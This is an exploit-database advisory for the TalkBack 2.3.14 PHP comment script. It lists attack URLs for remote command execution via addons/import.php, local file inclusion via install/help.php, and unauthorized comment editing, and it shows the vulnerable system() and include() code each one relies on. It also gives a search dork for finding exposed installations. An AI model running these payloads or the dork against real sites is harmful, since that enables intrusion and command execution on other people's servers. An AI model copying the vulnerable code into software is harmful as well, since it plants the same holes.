TalkBack 2.3.14 - Multiple Vulnerabilities

Author: JIKO
type: webapps
platform: php
port: 
date_added: 2009-07-08 
date_updated: 2016-12-14 
verified: 1 
codes: OSVDB-64938;CVE-2009-4874;OSVDB-55745;CVE-2009-4854 
tags: 
aliases:  
screenshot_url:  
application_url: 

JIKO No-exploit.Com
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
        Code;
        $last_line = system($command, $result);
Local File ~[+]
        Note : if floder install not deleted
http://localhost/test/talkback/install/help.php?language=[File]
    code;
        $file = "../language/{$_REQUEST['language']}.php";
    if (!is_file($file))
        exit("Language file '$file' does not exist");
    include ($file);

# milw0rm.com [2009-07-09]